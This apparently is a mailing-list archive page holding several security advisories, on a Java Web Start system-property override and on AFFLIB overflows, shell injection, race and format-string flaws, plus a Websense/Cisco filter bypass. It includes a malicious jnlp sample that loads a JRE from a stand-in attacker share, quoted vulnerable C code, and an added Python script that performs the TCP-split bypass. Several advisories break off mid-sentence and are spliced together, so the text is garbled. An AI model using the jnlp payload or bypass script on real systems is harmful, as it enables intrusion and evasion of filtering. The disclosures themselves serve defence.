-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Advisory Name: Java Web Start File Inclusion via System Properties Override
 Release Date: 2008-12-03
  Application: Sun Java Runtime Environment / Java Web Start
 Versions: See below
 Severity: High
   Author: Timothy D. Morgan tmorgan {a} vsecurity.com
Vendor Status: Patch Released [3]
CVE Candidate: CVE-2008-2086
Reference: http://www.vsecurity.com/bulletins/advisories/2008/JWS-props.txt

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-


Product Description
---
From [1]:

  "Using Java Web Start technology, standalone Java software applications
   can be deployed with a single click over the network. Java Web Start
   ensures the most current version of the application will be deployed,
   as well as the correct version of the Java Runtime Environment (JRE)."


Vulnerability Overview
--
On March 27th, VSR identified a vulnerability in Java Web Start related
to the execution of privileged applications.  This flaw could allow an
attacker to execute arbitrary code on a victim system if a user could be
convinced to visit a malicious web site.


Product Background
--
Java Web Start (JWS) applications are launched through specially
formatted XML files hosted on web sites with a jnlp file extension.
These files reference one or more jar files which are meant to be
downloaded and executed by client systems.  JWS applications are run in
unprivileged mode by default but may be run with full user privileges if
the jnlp file requests this access.  Privileged JWS applications must
have each jar file signed by the same trusted author in order to be
executed.  However, jnlp files are not signed and may be hosted by
third-party web sites.

In addition to specifying application components, the jnlp specification
permits application authors to supply certain System properties which
may be retrieved by the application through the System.getProperty() and
System.getProperties() methods.  Besides any user-supplied properties,
the Java VM also provides access to a number of sensitive runtime
settings through this interface.

More information on the jnlp format may be found in [2].


Vulnerability Details
-
VSR discovered an unsafe behavior in the way properties are interpreted
when specified in jnlp files.  In certain versions of the Java Runtime
Engine (JRE), values supplied through jnlp files override existing
system defaults. Thus far, VSR has verified the following System
properties may be overridden:

  java.home
  java.ext.dirs
  user.home

Of particular interest are the java.home and java.ext.dirs properties.
If an attacker could lure a victim to open a malicious jnlp file which
references a trusted application, it may be executed without any
confirmation by the user.  However, as the application attempts to load
classes, it may trust the malicious java.home and/or java.ext.dirs value.
These paths could point to a malicious local or remote JRE or extensions
installation.  It appears that under Windows, UNC network paths may be
used for the java.home value. It is not yet known whether or not UNC
paths may be used for java.ext.dirs.

During testing, VSR found that Java Cryptography Extension (JCE) classes
failed to load when java.home was set to an invalid path.  However, by
setting this path to a network share which hosted a valid JRE
installation, the JCE classes loaded correctly.  If such a network share
were hosted by the attacker, then arbitrary code could potentially be
loaded without restrictions, unbeknownst to the victim.

The following XML shows what a malicious jnlp file might look like.
Note that the malicious jnlp file would likely be very similar to the
ones users normally rely on, with certain properties overridden in the
resources section.

  <jnlp spec="1.0+" codebase="http://trusted.example.org/" href="evil.jnlp">
    <information>
      <title>Trusted Application</title>
      <vendor>Trusted Vendor</vendor>
      <description>Trusted Application by Trusted Vendor</description>
      <homepage href="http://trusted.example.org/" />
      <offline-allowed />
    </information>
    <security><all-permissions /></security>
    <resources>
      <j2se version="1.5+" />
      <!-- Next line overrides the JRE's java.home System property -->
      <property name="java.home" value="\\evil.example.com\jre" />
      <jar href="signed-and-trusted-jce-dependent-library.jar" />
    </resources>
    <application-desc main-class="org.example.trusted.app.StartApp" />
  </jnlp>

To fully exploit this specific attack vector, an attacker would need to
remotely or locally host a malicious version of classes used by a
trusted application and then lure a user into opening a malicious jnlp

AFFLIB(TM): Multiple Buffer Overflows

2007-04-27 Thread VSR Advisories
(path,fn+match[2].rm_so,match[2].rm_eo-match[2].rm_so);

The overflow occurs because the length specified to memcpy() is the
length of the regular expression match, without regard to the size of
the path buffer.  This may be exploitable in scenarios where an attacker
could pass command line parameters to a privileged aimage program, or
via a program written by a third-party developer.



* Stack-based Buffer Overflow in libewf Vnode Wrapper *
File: lib/vnode_ewf.cpp
Line: 70

Description:
A potentially untrustworthy parameter is used without length checking in
a strcpy() call which writes to a stack-based buffer. If this command
receives parameters from an untrusted source, code execution would be a
major risk.  Lines 59-70 are included to illustrate the problem:

static int ewf_open(AFFILE *af)
{

    if(strchr(af->fname,'.')==0) return -1; // need a '.' in the filename

    /* See how many files there are to open */
    char **files = (char **)malloc(sizeof(char *));
    int nfiles = 1;
    files[0] = strdup(af->fname);

    char fname[MAXPATHLEN+1];
    strcpy(fname,af->fname);

An overflow could occur because the af->fname string is provided by the
user, and is not limited to MAXPATHLEN.  An attacker could use this in
scenarios where a 3rd-party program incorporates AFFLIB(TM) into their
program (which ultimately accepts file names from an untrusted source)
or in situations where an AFFLIB(TM) binary is setuid/setgid or is
executed remotely via web applications.



* Stack-based Buffer Overflow in AFD Vnode Wrapper *
File: lib/vnode_afd.cpp
Line: 405

Description:
A potentially untrustworthy parameter is used without length checking in
a strcpy() call which writes to a stack-based buffer. If this command
receives parameters from an untrusted source, code execution would be a
major risk.  Lines 402-412 are included below for illustration:

    while ((dp = readdir(dirp)) != NULL){
        if (last4_is_aff(dp->d_name)){
            char path[MAXPATHLEN+1];
            strcpy(path,af->fname);
            strlcat(path,"/",sizeof(path));
            strlcat(path,dp->d_name,sizeof(path));
            if(afd_add_file(af,path)){
                return -1;
            }
        }
    }

The overflow would occur if a value for af->fname were specified by a
user which was larger than 1025 bytes.  This is certainly plausible,
since many systems allow pathnames to be as large as 4096 bytes.  As
this is part of the core AFFLIB(TM), it could be exploited in 3rd party
programs which include AFFLIB(TM) support, if an attacker were allowed
to specify filenames.  In addition, it could be exploited if any
AFFLIB(TM) binary were setuid/setgid, or if these programs were executed
from a CGI script or similar remote connection.
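The following is an added example, not AFFLIB(TM) code, of how the directory walk above can be written so that an oversized af->fname or directory entry is rejected instead of overflowing the MAXPATHLEN+1 stack buffer.  join_path(), afd_scan() and the callback interface are hypothetical names introduced here.

```c
#include <dirent.h>
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/param.h>   /* MAXPATHLEN, the bound the original buffer uses */
#include <sys/stat.h>

#ifndef MAXPATHLEN
#define MAXPATHLEN 1024
#endif

/* Same suffix test the original loop applies to each directory entry. */
int last4_is_aff(const char *name) {
    size_t n = strlen(name);
    return n >= 4 && strcmp(name + n - 4, ".aff") == 0;
}

/* Bounded replacement for strcpy(path, af->fname) + strlcat(): writes
 * "dir/name" into out and returns 0, or returns -1 with out emptied when
 * the result would not fit, instead of running past the buffer. */
int join_path(char *out, size_t outsz, const char *dir, const char *name) {
    /* snprintf never writes more than outsz bytes; its return value is the
     * length the full string needs, so >= outsz means it was truncated. */
    int need = snprintf(out, outsz, "%s/%s", dir, name);
    if (need < 0 || (size_t)need >= outsz) {
        if (outsz > 0) out[0] = '\0';
        return -1;
    }
    return 0;
}

/* Walks dir like the original afd loop, with the same MAXPATHLEN+1 stack
 * buffer, but refuses oversized entries. cb (may be NULL) receives each
 * .aff path; a non-zero return aborts the scan. Returns the number of .aff
 * entries seen, or -1 if the directory cannot be opened, a path would not
 * fit, or cb failed. */
int afd_scan(const char *dir, int (*cb)(const char *path, void *ctx), void *ctx) {
    DIR *dirp = opendir(dir);
    if (dirp == NULL) return -1;
    int count = 0;
    struct dirent *dp;
    while ((dp = readdir(dirp)) != NULL) {
        if (!last4_is_aff(dp->d_name)) continue;
        char path[MAXPATHLEN + 1];
        if (join_path(path, sizeof path, dir, dp->d_name) != 0 ||
            (cb != NULL && cb(path, ctx) != 0)) {
            closedir(dirp);
            return -1;
        }
        count++;
    }
    closedir(dirp);
    return count;
}

/* Example callback: print each segment path found. */
int print_path(const char *path, void *ctx) {
    (void)ctx;
    puts(path);
    return 0;
}

int main(int argc, char **argv) {
    const char *dir = argc > 1 ? argv[1] : ".";
    int n = afd_scan(dir, print_path, NULL);
    if (n < 0) { fprintf(stderr, "scan of %s failed\n", dir); return 1; }
    printf("%d .aff segment(s)\n", n);
    return 0;
}
```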



* Stack-based Buffer Overflow in aimage Input File Name *
File: aimage/aimage.cpp
Line: 554

Description:
A command line parameter is used without length checking in a sprintf()
call, which writes to a stack-based buffer. If this command (or this
function) receives parameters from an untrusted source, code execution
would be a major risk.  Lines 548-554 are included for illustration:

int getlock(class imager *im)
{
    /* If the file exists and the PID in the file is running,
     * can't get the lock.
     */
    char lockfile[MAXPATHLEN];
    sprintf(lockfile,"/tmp/aimge.%s.lock",im->infile);

An attacker could exploit this problem if the aimage binary were
setuid/setgid, or if the aimage program were executed in a CGI script or
something similar.



Vendor Response:

Simson Garfinkel was first contacted on 2007-03-31. The following
timeline outlines the responses from the vendor regarding this issue:

 2007-04-01 - Vendor provided details of all vulnerabilities
  identified.  
 2007-04-03 - Continued vendor communication.
 2007-04-05 - Vendor released version 2.2.6, containing multiple
  security fixes.
 2007-04-06 - Vendor notified VSR that fixes were released.
 2007-04-09 - VSR notified vendor that 9 vulnerability instances still 
  remained in latest release.
 2007-04-12 - Vendor confirmed that remaining vulnerabilities would be
  fixed in next release.
 2007-04-25 - Vendor released versions 2.2.7 and 2.2.8.  Vendor did not 
  notify VSR.
 2007-04-27 - VSR discovered new versions were released.  VSR inspected 
  version 2.2.8 and found that no additional vulnerabilities
  were fixed.  VSR advisories published.
 

Recommendation:

AFFLIB(TM) users should upgrade to the newest version.  Third-party
projects which rely on AFFLIB(TM) should encourage users to upgrade,
and/or incorporate fixes into their distribution of the library.

The update is available via:

 http://www.afflib.org/downloads/

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Common Vulnerabilities and Exposures (CVE) Information:

The Common

AFFLIB(TM): Multiple Shell Metacharacter Injections

2007-04-27 Thread VSR Advisories



 Virtual Security Research, LLC.
http://www.vsecurity.com/
Security Advisory

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Advisory Name: Multiple Shell Metacharacter Injections in AFFLIB
 Release Date: 2007-04-27
  Application: AFFLIB(TM)
 Versions: 2.2.0-2.2.8 and likely earlier versions
 Severity: Medium to Low
   Author: Timothy D. Morgan tmorgan {at} vsecurity {dot} com
Vendor Status: Vendor Notified
CVE Candidate: CVE-2007-2055
Reference: 
http://www.vsecurity.com/bulletins/advisories/2007/afflib-shellinject.txt
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-


Product Description:

 From the forensicswiki.org website[1]:

  "The Advanced Forensics Format (AFF) is an extensible open format for
   the storage of disk images and related forensic metadata. It was
   developed by Simson Garfinkel and Basis Technology."

AFFLIB(TM) is the reference implementation of the AFF(TM) format,
written primarily by Simson Garfinkel.  It comes in the form of an open
source library and a set of command line tools used to manipulate
AFF(TM) files.



Vulnerability Overview:

In mid-March, 2007 Virtual Security Research, LLC (VSR) performed a
security code review of AFFLIB(TM) as a part of an internal tool
assessment process.  As a result, multiple vulnerabilities of varying
severities were discovered. The most significant of these
vulnerabilities are being announced publicly to raise awareness and help
end-users secure themselves against potential attack.

VSR found that user-supplied command line parameters were used in
several popen() calls without validation or escaping.  The attack
vectors available are limited, which reduces the overall severity of
these problems.

These vulnerabilities remain exploitable in the latest release (2.2.8), 
even though an attempt was made to check for a set of shell 
metacharacters.  All line numbers listed below are from version 2.2.0.


Vulnerability Details:

The following sections include detailed descriptions of the specific
instances of shell metacharacter injection found during the assessment.


* Shell Command Injections in Decompression Calls *

File: tools/afconvert.cpp
Lines: 245 & 255
Platforms Affected: Unix

Description:
A command line parameter is used without validation or escaping in a
popen() call. If this command (or this function) receives parameters
from an untrusted source, code execution would be a major risk.  Lines
240-257 are included below for illustration:

    /* Check to see if it is a gzip file... */
    if(probe_gzip(infile) &&
       yesno("infile looks like a gzip file","Uncompress it","Uncompressing")){
        /* Open with a subprocess. We will need to use zlib when we move to Windows. */
        char buf[256];
        sprintf(buf,"gzcat %s",infile);
        a_in = af_popen(buf,"r");
    }

    /* Check to see if it is a bzip2 file... */
    if(!a_in &&
       probe_bzip2(infile) &&
       yesno("infile looks like a bzip2 file","Uncompress it","Uncompressing")){
        /* Open with a subprocess. We will need to use bzip2zlib when we move to Windows. */
        char buf[256];
        sprintf(buf,"bzcat %s",infile);
        a_in = af_popen(buf,"r");
    }


Since af_popen() ultimately uses the popen() system call, and infile
comes directly from a command line parameter, command line special
characters could be injected if an attacker could control the input.



* Shell Command Injection in Unused get_parameter Function *

File: aimage/ident.cpp
Line: 190
Platforms Affected: Unix

Description:
A function parameter is used without validation or escaping in a popen()
call. If this function (get_parameter) received arguments from an
untrusted source, code execution would be a major risk. This function
does not appear to be called at this time.



Vendor Response:

Simson Garfinkel was first contacted on 2007-03-31. The following
timeline outlines the responses from the vendor regarding this issue:

 2007-04-01 - Vendor provided details of all vulnerabilities
  identified.  
 2007-04-03 - Continued vendor communication.
 2007-04-05 - Vendor released version 2.2.6, containing multiple
  security fixes.
 2007-04-06 - Vendor notified VSR that fixes were released.
 2007-04-09 - VSR notified vendor that 9 vulnerability instances still 
  remained in latest release.
 2007-04-12 - Vendor confirmed that remaining vulnerabilities would be
  fixed in next release.
 2007-04-25 - Vendor released versions 2.2.7 and 2.2.8.  Vendor did not 
  notify VSR.
 2007-04-27 - VSR discovered new versions were released.  VSR inspected 
  version 2.2.8 and found that no additional vulnerabilities
  were fixed.  VSR advisories published

AFFLIB(TM): Time-of-Check-Time-of-Use File Race

2007-04-27 Thread VSR Advisories



 Virtual Security Research, LLC.
http://www.vsecurity.com/
Security Advisory

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Advisory Name: Time-of-Check-Time-of-Use File Race in AFFLIB
 Release Date: 2007-04-27
  Application: AFFLIB(TM)
 Versions: 2.2.0-2.2.8 and likely earlier versions.
 Severity: Low
   Author: Timothy D. Morgan tmorgan {at} vsecurity {dot} com
Vendor Status: Vendor Notified
CVE Candidate: CVE-2007-2056
Reference: 
 http://www.vsecurity.com/bulletins/advisories/2007/afflib-toctou.txt
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-


Product Description:

 From the forensicswiki.org website[1]:

  "The Advanced Forensics Format (AFF) is an extensible open format for
   the storage of disk images and related forensic metadata. It was
   developed by Simson Garfinkel and Basis Technology."

AFFLIB(TM) is the reference implementation of the AFF(TM) format,
written primarily by Simson Garfinkel.  It comes in the form of an open
source library and a set of command line tools used to manipulate
AFF(TM) files.



Vulnerability Overview:

In mid-March, 2007 Virtual Security Research, LLC (VSR) performed a
security code review of AFFLIB(TM) as a part of an internal tool
assessment process.  As a result, multiple vulnerabilities of varying
severities were discovered. The most significant of these
vulnerabilities are being announced publicly to raise awareness and help
end-users secure themselves against potential attack.

A time-of-check-time-of-use race was discovered in AFFLIB(TM) which
could allow an attacker on the local machine to overwrite an arbitrary
file.  Because the content of the file would not be controllable by an
attacker, it is unlikely that this vulnerability is exploitable for
more than a denial-of-service.

This vulnerability remains in the latest version (2.2.8) despite several
notifications to the vendor.  All line numbers listed below are from 
version 2.2.0.


Vulnerability Details:

File: aimage/aimage.cpp
Lines: 554-575
Platforms Affected: Unix

Description:
The lockfile is created under /tmp with a mostly predictable name. An
access check is first performed, and later the file is opened, truncating
it if it already exists. Since the time of check and the time of use are
not the same, a filesystem race could be exploited by a local attacker
through the use of a symlink. Lines 548-582 are included below to
illustrate the problem:

int getlock(class imager *im)
{
    /* If the file exists and the PID in the file is running,
     * can't get the lock.
     */
    char lockfile[MAXPATHLEN];
    sprintf(lockfile,"/tmp/aimge.%s.lock",im->infile);
    if(access(lockfile,F_OK)==0){
        /* Lockfile exists. Get its pid */
        char buf[1024];
        FILE *f = fopen(lockfile,"r");
        if(!f){
            perror(lockfile);   // can't read lockfile...
            return -1;
        }
        fgets(buf,sizeof(buf),f);
        buf[sizeof(buf)-1] = 0;
        int pid = atoi(buf);
        if(checkpid(pid)==0){
            /* PID is not running; we can delete the lockfile */
            if(unlink(lockfile)){
                err(1,"could not delete lockfile %s: ",lockfile);
            }
        }
        /* PID is running; generate error */
        errx(1,"%s is locked by process %d\n",im->infile,pid);
    }
    FILE *f = fopen(lockfile,"w");
    if(!f){
        err(1,lockfile);
    }
    fprintf(f,"%d\n",getpid()); // save our PID.
    fclose(f);
    return 0;
}

This is likely only exploitable for a denial-of-service condition, since
the attacker would have little control over the content being written
(the process ID of aimage).



Vendor Response:

Simson Garfinkel was first contacted on 2007-03-31. The following
timeline outlines the responses from the vendor regarding this issue:

 2007-04-01 - Vendor provided details of all vulnerabilities
  identified.  
 2007-04-03 - Continued vendor communication.
 2007-04-05 - Vendor released version 2.2.6, containing multiple
  security fixes.
 2007-04-06 - Vendor notified VSR that fixes were released.
 2007-04-09 - VSR notified vendor that 9 vulnerability instances still 
  remained in latest release.
 2007-04-12 - Vendor confirmed that remaining vulnerabilities would be
  fixed in next release.
 2007-04-25 - Vendor released versions 2.2.7 and 2.2.8.  Vendor did not 
  notify VSR.
 2007-04-27 - VSR discovered new versions were released.  VSR inspected 
  version 2.2.8 and found that no additional vulnerabilities
  were fixed.  VSR advisories published.


Recommendation:

AFFLIB(TM) users should upgrade to the newest version.  Third-party

AFFLIB(TM): Multiple Format String Injections

2007-04-27 Thread VSR Advisories
        ){
            /* PID is not running; we can delete the lockfile */
            if(unlink(lockfile)){
                err(1,"could not delete lockfile %s: ",lockfile);
            }
        }
        /* PID is running; generate error */
        errx(1,"%s is locked by process %d\n",im->infile,pid);
    }
    FILE *f = fopen(lockfile,"w");
    if(!f){
        err(1,lockfile);

Since the im->infile value could be specified by a user, the lockfile
string could contain format string characters.  An attacker could
exploit this problem if the aimage binary were setuid/setgid, or if the
aimage program were executed in a CGI script or something similar.



* Format String Injection in imager *
File: aimage/imager.cpp
Line: 265

Description:
A command line parameter is used as the format string in the err()
call. If an attacker could control this name, a format string injection
vulnerability could be exploited.



* Format String Injection in afxml *
File: tools/afxml.cpp
Line: 101

Description:
A command line parameter is used as the format string in the err()
call. If an attacker could control this name, a format string injection
vulnerability could be exploited.




Vendor Response:

Simson Garfinkel was first contacted on 2007-03-31. The following
timeline outlines the responses from the vendor regarding this issue:

 2007-04-01 - Vendor provided details of all vulnerabilities
  identified.  
 2007-04-03 - Continued vendor communication.
 2007-04-05 - Vendor released version 2.2.6, containing multiple
  security fixes.
 2007-04-06 - Vendor notified VSR that fixes were released.
 2007-04-09 - VSR notified vendor that 9 vulnerability instances still 
  remained in latest release.
 2007-04-12 - Vendor confirmed that remaining vulnerabilities would be
  fixed in next release.
 2007-04-25 - Vendor released versions 2.2.7 and 2.2.8.  Vendor did not 
  notify VSR.
 2007-04-27 - VSR discovered new versions were released.  VSR inspected 
  version 2.2.8 and found that no additional vulnerabilities
  were fixed.  VSR advisories published.


Recommendation:

AFFLIB(TM) users should upgrade to the newest version.  Third-party
projects which rely on AFFLIB(TM) should encourage users to upgrade,
and/or incorporate fixes into their distribution of the library.

The update is available via:

 http://www.afflib.org/downloads/

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Common Vulnerabilities and Exposures (CVE) Information:

The Common Vulnerabilities and Exposures (CVE) project has assigned
the following name to these issues.  This is a candidate for inclusion
in the CVE list (http://cve.mitre.org), which standardizes names for
security problems.

  CVE-2007-2054

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

References:

1. AFF - Forensics Wiki
   http://www.forensicswiki.org/wiki/AFF

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

This advisory is distributed for educational purposes only, and comes
with absolutely NO WARRANTY; not even the implied warranty of
merchantability or fitness for a particular purpose.  Virtual Security
Research, LLC nor the author accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Vulnerability Disclosure Policy:

  http://www.vsecurity.com/disclosurepolicy.html

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

AFF(TM) and AFFLIB(TM) are trademarks of Simson Garfinkel and Basis
Technology Corp.

Included source code excerpts are copyright Simson Garfinkel and Basis
Technology Corp.

This advisory is copyright (C) 2007 Virtual Security Research, LLC. All
rights reserved.


VSR Advisory: WebSense content filter bypass when deployed in conjunction with Cisco filtering devices

2006-05-08 Thread VSR Advisories

   Virtual Security Research, LLC.
  http://www.vsecurity.com/
  Security Advisory

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Advisory Name: WebSense content filter bypass when deployed in
               conjunction with Cisco filtering devices
 Release Date: 2006-05-08
  Application: Websense in Conjunction with Cisco PIX
  Version: Websense 5.5.2
   Cisco PIX OS / ASA  7.0.4.12
   Cisco PIX OS  6.3.5(112)
   FWSM 2.3.x
   FWSM 3.x
   (other versions untested)
 Severity: Low
   Author: George D. Gal ggal_at_vsecurity.com
Vendor Status: Vendor Notified, Fix Available
CVE Candidate: CVE-2006-0515
Reference:
http://www.vsecurity.com/bulletins/advisories/2006/cisco-websense-bypass.txt
- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-


Product Description:

From the WebSense website[1]:


 Websense Enterprise, the industry-leading web filtering solution,
  improves employee productivity, reduces legal liability, and optimizes
  the use of IT resources. Websense Enterprise integrates seamlessly
  with leading network infrastructure products to offer unequaled
  flexibility and control.


Vulnerability Overview:

On August 9th, 2005, VSR identified a way to bypass Websense URL
filtering when Websense is used in conjunction with a Cisco PIX for web
content filtering.  Shortly thereafter another security researcher
[sledge.hammer(a+t)sinhack.net] published[2] a proof-of-concept for
evading the URL filtering performed by Websense, claiming that Websense
had failed to address the issue.  Cisco has since verified the
vulnerability as a problem that lies within the Cisco device's handling
of filtered requests, not within Websense itself.


Vulnerability Details:

The vulnerability exists primarily because of the manner in which the
Cisco PIX and other Cisco filtering devices handle an HTTP request that
has been split across TCP segments when integrated with Websense
Enterprise.

For each HTTP request, the Cisco PIX (or other Cisco device) inspects
the individual packets of the request and consults Websense to determine
whether the request should be permitted.  When the HTTP request is split
into two or more TCP segments in the middle of the HTTP method, however,
the filtering mechanism is circumvented.

Additionally, requests using this split approach do not appear in the
Websense logs, indicating that the request is never sent to Websense for
policy inspection at all.

The simplest form of the attack is to send the first character of the
HTTP request in its own TCP segment, followed by a single TCP segment
carrying the remainder of the request (e.g. with the PSH flag set on each
segment so that neither is held back for coalescing).

Virtual Security Research has created a utility[3] to demonstrate the
ability to bypass Websense filtering for the affected versions of Cisco
filtering devices enumerated in this advisory header. You may download
and run this utility at your own risk from:

 http://www.vsecurity.com/tools/WebsenseBypassProxy.java
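The following Python script is an added example and is not VSR's
WebsenseBypassProxy utility nor any code from the original advisory.  It
shows the client side of the technique (the first byte of the method in its
own send(), the rest in a second, with TCP_NODELAY so the kernel emits two
PSH segments as in the capture below), a loopback round trip proving the
end host still reassembles one intact request, and, for the detection side,
a small check that flags a stream whose first data segment is a proper
prefix of an HTTP method.  The request text and host name are constructed
sample data; nothing is sent to that host.

```python
import socket
import threading
from typing import List

# Constructed sample request (text only; mirrors the GET /favicon.ico request
# in the advisory's capture, nothing is fetched from that host here).
REQUEST = (
    b"GET /favicon.ico HTTP/1.1\r\n"
    b"Host: www.phrack.org\r\n"
    b"User-Agent: split-demo\r\n"
    b"\r\n"
)

HTTP_METHODS = (b"GET", b"POST", b"HEAD", b"PUT", b"DELETE",
                b"OPTIONS", b"TRACE", b"CONNECT")


def split_request(request: bytes, first_len: int = 1) -> List[bytes]:
    """Chunks to send one per TCP segment: the advisory's simplest form puts
    the first byte of the method in its own segment and the rest in a second."""
    if not 0 < first_len < len(request):
        raise ValueError("first_len must fall strictly inside the request")
    return [request[:first_len], request[first_len:]]


def send_split(sock: socket.socket, request: bytes, first_len: int = 1) -> int:
    """Write each chunk with its own send(); TCP_NODELAY stops Nagle from
    merging the 1-byte write into the next one, so the kernel emits two
    PSH-flagged segments like the capture in the advisory.  Returns the
    number of chunks written."""
    sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
    chunks = split_request(request, first_len)
    for chunk in chunks:
        sock.sendall(chunk)
    return len(chunks)


def looks_like_method_split(payloads: List[bytes]) -> bool:
    """Detection side: flag a client stream whose first data segment is a
    proper prefix of an HTTP method (e.g. b"G") and whose reassembled data
    starts with a full method, the pattern visible in the Snort output."""
    if len(payloads) < 2 or not payloads[0]:
        return False
    first = payloads[0]
    stream = b"".join(payloads)
    full_method = stream.split(b" ", 1)[0]
    return (full_method in HTTP_METHODS
            and len(first) < len(full_method)
            and full_method.startswith(first))


def loopback_roundtrip(request: bytes, first_len: int = 1) -> bytes:
    """Send the split request to a throwaway server on 127.0.0.1 and return
    what it reassembled: the end host still sees one intact request; only an
    inspector that judges each segment on its own is fooled."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    received = bytearray()

    def serve() -> None:
        conn, _ = srv.accept()
        conn.settimeout(5)
        with conn:
            while not received.endswith(b"\r\n\r\n"):
                data = conn.recv(4096)
                if not data:
                    break
                received.extend(data)

    worker = threading.Thread(target=serve)
    worker.start()
    with socket.create_connection(srv.getsockname()) as cli:
        send_split(cli, request, first_len)
    worker.join()
    srv.close()
    return bytes(received)


if __name__ == "__main__":
    print(split_request(REQUEST))
    print("reassembled intact:", loopback_roundtrip(REQUEST) == REQUEST)
    print("split detected:", looks_like_method_split(split_request(REQUEST)))
```

The detection check deliberately keys on the split falling inside the method
token rather than on segment size alone, because a legitimate client that
happens to flush a small first write will still start its stream with a
complete method.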

The following Snort output shows the split request that bypasses
Websense: the first segment carries only the byte 'G' (Seq 0xF5B80F51),
the server acknowledges that single byte (Ack 0xF5B80F52), and the second
segment (Seq 0xF5B80F52) carries the remainder of the request,
"ET /favicon.ico HTTP/1.1 ...":

- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
11/04-10:06:36.260991 0:B:DB:DE:19:87 -> 0:0:C:7:AC:5 type:0x800 len:0x43
10.254.5.113:58034 -> 82.165.25.125:80 TCP TTL:64 TOS:0x0 ID:1534
IpLen:20 DgmLen:53 DF
***AP*** Seq: 0xF5B80F51  Ack: 0x21D6E47  Win: 0x8040  TcpLen: 32
TCP Options (3) => NOP NOP TS: 148674 160066961
47                                                G

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

11/04-10:06:36.359288 0:30:7B:93:19:4C -> 0:B:DB:DE:19:87 type:0x800 len:0x42
82.165.25.125:80 -> 10.254.5.113:58034 TCP TTL:49 TOS:0x0 ID:36972
IpLen:20 DgmLen:52 DF
***A**** Seq: 0x21D6E47  Ack: 0xF5B80F52  Win: 0x16A0  TcpLen: 32
TCP Options (3) => NOP NOP TS: 160066973 148674

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

11/04-10:06:36.359387 0:B:DB:DE:19:87 -> 0:0:C:7:AC:5 type:0x800 len:0x185
10.254.5.113:58034 -> 82.165.25.125:80 TCP TTL:64 TOS:0x0 ID:1535
IpLen:20 DgmLen:375 DF
***AP*** Seq: 0xF5B80F52  Ack: 0x21D6E47  Win: 0x8040  TcpLen: 32
TCP Options (3) => NOP NOP TS: 148683 160066973
45 54 20 2F 66 61 76 69 63 6F 6E 2E 69 63 6F 20  ET /favicon.ico
48 54 54 50 2F 31 2E 31 0D 0A 48 6F 73 74 3A 20  HTTP/1.1..Host:
77 77 77 2E 70 68 72 61 63 6B 2E 6F 72 67 0D 0A  www.phrack.org..
55 73 65 72 2D 41 67 65 6E 74 3A 20 4D 6F 7A 69  User-Agent: Mozi
6C 6C 61 2F 35 2E 30 20 28 58 31 31 3B 20 55 3B  lla/5.0 (X11; U;
20 46 72 65 65 42 53 44 20 69 33 38 36 3B 20 65   FreeBSD i386; e
6E 2D 55 53 3B 20 72 76 3A 31 2E 37 2E 39 29 20  n-US; rv:1.7.9)
47 65 63 6B 6F 2F 32 30 30 35 30 37 31 38 20 46  Gecko/20050718 F
69 72 65 66 6F 78 2F 31 2E 30 2E 35 0D 0A 41 63  irefox/1.0.5..Ac
63 65 70 74 3A 20 69 6D 61 67 65 2F 70 6E 67 2C  cept: image/png,
2A 2F 2A 3B 71 3D 30 2E 

VSR Advisory: IBM Tivoli Access Manager - Web Server Plug-in File Retrieval Vulnerability

2006-02-04 Thread VSR Advisories
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1



   Virtual Security Research, LLC.
  http://www.vsecurity.com/
 Security Advisory

- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-


Advisory Name: Remote Directory Traversal and File Retrieval
 Release Date: 2006-02-03
